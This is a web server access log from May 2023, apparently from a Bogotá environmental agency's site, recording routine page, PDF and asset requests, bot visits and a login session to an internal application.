201.245.192.253 - - [14/May/2023:16:29:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40376
201.245.192.253 - - [14/May/2023:16:29:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43649
201.245.192.253 - - [14/May/2023:16:29:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:16:27:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:16:28:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
35.236.230.103 - - [14/May/2023:16:30:39 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.0" 200 1065
34.85.220.166 - - [14/May/2023:16:31:04 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.0" 200 1065
216.245.221.92 - - [14/May/2023:16:32:49 -0500] "HEAD / HTTP/1.1" 200 -
168.119.251.242 - - [14/May/2023:16:33:41 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [14/May/2023:16:34:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:16:33:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
172.22.2.4 - - [14/May/2023:16:33:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.84 - - [14/May/2023:16:35:35 -0500] "GET /images/cronica-amanda-rodriguez-30-abril.jpg HTTP/1.1" 200 26304
172.22.2.4 - - [14/May/2023:16:34:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56287
172.22.2.4 - - [14/May/2023:16:37:05 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
216.245.221.92 - - [14/May/2023:16:37:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:16:39:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40376
201.245.192.253 - - [14/May/2023:16:39:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43649
201.245.192.253 - - [14/May/2023:16:39:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
40.77.167.146 - - [14/May/2023:16:40:52 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
172.22.2.4 - - [14/May/2023:16:39:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:16:40:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
216.245.221.92 - - [14/May/2023:16:42:49 -0500] "HEAD / HTTP/1.1" 200 -
146.70.178.110 - - [14/May/2023:16:43:24 -0500] "GET /que-tal-una-caminata-ecologica-conoce-la-programacion-que-en-mayo-la-secretaria-de-ambiente-tiene-para-ti.html HTTP/1.1" 200 821
173.252.83.8 - - [14/May/2023:16:43:40 -0500] "GET /images/Sello%201%20JA-2.jpeg HTTP/1.1" 200 42236
201.245.192.253 - - [14/May/2023:16:44:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
173.252.127.24 - - [14/May/2023:16:44:36 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
66.249.77.23 - - [14/May/2023:16:46:29 -0500] "-" 408 -
172.22.2.4 - - [14/May/2023:16:45:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/May/2023:16:47:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:16:46:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
201.245.192.253 - - [14/May/2023:16:49:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
216.245.221.92 - - [14/May/2023:16:52:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:16:51:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:16:52:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
201.245.192.253 - - [14/May/2023:16:54:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:16:55:10 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Sentencia%20T-1077,%202%20corregida.doc HTTP/1.1" 200 47616
94.102.49.193 - - [14/May/2023:16:56:37 -0500] "-" 408 -
216.245.221.92 - - [14/May/2023:16:57:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:16:57:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:16:59:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:16:57:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57945
162.55.166.12 - - [14/May/2023:17:01:50 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [14/May/2023:17:02:49 -0500] "HEAD / HTTP/1.1" 200 -
186.84.21.224 - - [14/May/2023:17:03:31 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
201.245.192.253 - - [14/May/2023:17:04:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:17:02:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:17:03:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58307
216.245.221.92 - - [14/May/2023:17:07:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:17:09:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
205.210.31.251 - - [14/May/2023:17:09:44 -0500] "GET / HTTP/1.0" 200 319
40.77.167.146 - - [14/May/2023:17:09:45 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
172.22.2.4 - - [14/May/2023:17:08:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.71 - - [14/May/2023:17:10:29 -0500] "-" 408 -
172.22.2.4 - - [14/May/2023:17:09:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55934
216.245.221.92 - - [14/May/2023:17:12:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:17:14:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:17:14:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:17:15:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
216.245.221.92 - - [14/May/2023:17:17:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:17:19:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
201.245.192.253 - - [14/May/2023:17:19:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40362
201.245.192.253 - - [14/May/2023:17:19:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43512
66.220.149.2 - - [14/May/2023:17:20:14 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
40.77.167.146 - - [14/May/2023:17:20:56 -0500] "GET /BLA/resoluciones/AUTOS%202014/1513.pdf HTTP/1.1" 200 609673
172.22.2.4 - - [14/May/2023:17:20:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/May/2023:17:22:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:17:21:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56754
201.245.192.253 - - [14/May/2023:17:23:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
52.167.144.32 - - [14/May/2023:17:27:18 -0500] "GET /red-de-calidad-hidrica-de-bogota-una-herramienta-para-monitorear-la-calidad-del-agua.html HTTP/1.1" 200 817
216.245.221.92 - - [14/May/2023:17:27:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:17:26:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:17:27:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
201.245.192.253 - - [14/May/2023:17:28:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
201.245.192.253 - - [14/May/2023:17:29:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40362
201.245.192.253 - - [14/May/2023:17:29:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43512
216.245.221.92 - - [14/May/2023:17:32:49 -0500] "HEAD / HTTP/1.1" 200 -
186.29.181.252 - - [14/May/2023:17:33:39 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.29.181.252 - - [14/May/2023:17:33:39 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
186.29.181.252 - - [14/May/2023:17:33:39 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
172.22.2.4 - - [14/May/2023:17:32:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:17:33:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:17:32:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51977
172.22.2.4 - - [14/May/2023:17:33:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53924
172.22.2.4 - - [14/May/2023:17:37:12 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1218
216.245.221.92 - - [14/May/2023:17:37:49 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.146 - - [14/May/2023:17:38:07 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [14/May/2023:17:38:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
201.245.192.253 - - [14/May/2023:17:39:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40362
201.245.192.253 - - [14/May/2023:17:39:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43512
172.22.2.4 - - [14/May/2023:17:37:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.37 - - [14/May/2023:17:39:58 -0500] "-" 408 -
172.22.2.4 - - [14/May/2023:17:38:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
216.245.221.92 - - [14/May/2023:17:42:49 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.97 - - [14/May/2023:17:43:35 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [14/May/2023:17:43:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:17:45:27 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [14/May/2023:17:43:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:17:45:28 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
186.30.41.88 - - [14/May/2023:17:45:30 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
186.30.41.88 - - [14/May/2023:17:45:34 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 468646
172.22.2.4 - - [14/May/2023:17:45:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [14/May/2023:17:44:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54808
179.19.46.95 - - [14/May/2023:17:47:49 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
216.245.221.92 - - [14/May/2023:17:47:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:17:48:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:17:49:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:17:50:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56754
172.22.2.4 - - [14/May/2023:17:52:11 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2006%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 200 4657752
216.245.221.92 - - [14/May/2023:17:52:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:17:53:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:17:53:56 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [14/May/2023:17:53:57 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:17:53:57 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:17:53:57 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:17:53:57 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:17:53:57 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:17:53:57 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:17:53:57 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:17:53:57 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:17:53:57 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:17:53:57 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [14/May/2023:17:55:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [14/May/2023:17:57:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:17:56:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
186.30.41.88 - - [14/May/2023:17:58:46 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 468646
201.245.192.253 - - [14/May/2023:17:58:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
207.46.13.211 - - [14/May/2023:18:00:12 -0500] "GET /BLA/resoluciones/AUTOS%202021/6400.pdf HTTP/1.1" 304 -
172.22.2.4 - - [14/May/2023:17:58:57 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 61759
172.22.2.4 - - [14/May/2023:18:00:40 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
40.77.167.97 - - [14/May/2023:18:00:57 -0500] "GET /BLA/resoluciones/AUTOS%202013/0157.pdf HTTP/1.1" 200 1720610
190.24.190.90 - - [14/May/2023:18:01:45 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
190.24.190.90 - - [14/May/2023:18:01:45 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
190.24.190.90 - - [14/May/2023:18:01:46 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12178
190.24.190.90 - - [14/May/2023:18:01:46 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
190.24.190.90 - - [14/May/2023:18:01:46 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
190.24.190.90 - - [14/May/2023:18:01:46 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:01:46 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:01:46 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
190.24.190.90 - - [14/May/2023:18:01:46 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:01:46 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
190.24.190.90 - - [14/May/2023:18:01:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:01:46 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:01:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:01:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:01:47 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
190.24.190.90 - - [14/May/2023:18:01:47 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
190.24.190.90 - - [14/May/2023:18:01:47 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
190.24.190.90 - - [14/May/2023:18:01:49 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12855
190.24.190.90 - - [14/May/2023:18:01:49 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
190.24.190.90 - - [14/May/2023:18:01:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:01:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:01:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:01:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:01:50 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
190.24.190.90 - - [14/May/2023:18:01:58 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 7225
190.24.190.90 - - [14/May/2023:18:01:59 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 17593
190.24.190.90 - - [14/May/2023:18:01:59 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:01:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:01:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:00 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:00 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:00 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
190.24.190.90 - - [14/May/2023:18:02:00 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
190.24.190.90 - - [14/May/2023:18:02:00 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
190.24.190.90 - - [14/May/2023:18:02:05 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
190.24.190.90 - - [14/May/2023:18:02:05 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 5029
190.24.190.90 - - [14/May/2023:18:02:07 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 43290
190.24.190.90 - - [14/May/2023:18:02:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:07 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:08 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:08 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12898
190.24.190.90 - - [14/May/2023:18:02:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 130648
190.24.190.90 - - [14/May/2023:18:02:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:28 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 43723
190.24.190.90 - - [14/May/2023:18:02:28 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:28 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:28 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:28 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.24.190.90 - - [14/May/2023:18:02:29 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
216.245.221.92 - - [14/May/2023:18:02:49 -0500] "HEAD / HTTP/1.1" 200 -
66.249.77.21 - - [14/May/2023:18:02:55 -0500] "-" 408 -
172.22.2.4 - - [14/May/2023:18:01:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:18:02:58 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [14/May/2023:18:02:59 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2006%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 200 4657752
172.22.2.4 - - [14/May/2023:18:02:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
201.245.192.253 - - [14/May/2023:18:03:47 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:18:04:41 -0500] "GET /BLA/boletinlegal/consulta_actos.php?tipo=autos&no=3089&usuario=&sector=&fecha=2018&resuelve= HTTP/1.1" 200 1338
172.22.2.4 - - [14/May/2023:18:07:12 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [14/May/2023:18:06:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [14/May/2023:18:06:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
216.245.221.92 - - [14/May/2023:18:07:49 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.146 - - [14/May/2023:18:08:00 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
172.22.2.4 - - [14/May/2023:18:07:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:18:08:46 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:18:07:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
40.77.167.84 - - [14/May/2023:18:10:05 -0500] "GET /images/dia-mundial-agua-secretaria-22-marzo.jpg HTTP/1.1" 200 36625
173.252.87.113 - - [14/May/2023:18:12:01 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
52.167.144.32 - - [14/May/2023:18:12:41 -0500] "GET /conoce-las-medidas-de-prevencion-y-mitigacion-contempladas-en-la-alerta-fase-1-por-calidad-del-aire.html HTTP/1.1" 200 917
216.245.221.92 - - [14/May/2023:18:12:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [14/May/2023:18:13:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [14/May/2023:18:13:49 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%201%20del%2012%20de%20Abril%20de%202011.pdf HTTP/1.1" 200 366269
172.22.2.4 - - [14/May/2023:18:12:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:18:13:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55934
186.30.41.88 - - [14/May/2023:18:16:51 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 329829
216.245.221.92 - - [14/May/2023:18:17:49 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.211 - - [14/May/2023:18:18:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/2103.pdf HTTP/1.1" 304 -
40.77.167.97 - - [14/May/2023:18:18:29 -0500] "GET /BLA/resoluciones/AUTOS%202020/4093.pdf HTTP/1.1" 200 355460
40.77.167.157 - - [14/May/2023:18:18:45 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%203%20del%2023%20de%20Marzo%20de%202012.pdf HTTP/1.1" 200 572950
201.245.192.253 - - [14/May/2023:18:18:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
201.245.192.253 - - [14/May/2023:18:19:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40361
201.245.192.253 - - [14/May/2023:18:19:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43974
138.201.157.89 - - [14/May/2023:18:20:10 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [14/May/2023:18:18:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [14/May/2023:18:19:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
69.63.184.4 - - [14/May/2023:18:22:12 -0500] "GET /dale-una-nueva-oportunidad-a-tu-ropa-usada-se-trasladan-dos-puntos-para-llevarla.html HTTP/1.1" 206 913
